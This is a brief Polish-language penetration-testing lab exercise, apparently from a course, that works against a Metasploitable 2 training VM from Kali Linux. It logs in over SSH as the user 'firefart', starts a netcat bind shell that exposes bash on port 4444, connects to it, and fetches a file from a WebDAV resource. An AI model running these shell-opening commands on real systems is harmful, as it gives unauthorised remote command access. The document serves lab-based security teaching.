Środowisko:

- Kali Linux
- Metasploitable 2 VM

1. [Kali Linux] Zaloguj się wykorzystujac login i haslo z cwiczenia 9 => ssh -o HostKeyAlgorithms=+ssh-dss firefart@[IP serwera metasploitable]
2. [Metasploitable 2 VM] Uruchom bind shell z powłoką bash => nc -lnvp 4444 -e /bin/bash &
3. [Kali Linux] zaloguj sie shell`a na porcie tcp/4444 => nc -nv [IP serwera metasploitable] 4444
4. [Kali Linux] Zaloguj via przegladarka do zasobu www /dav i pobierz plik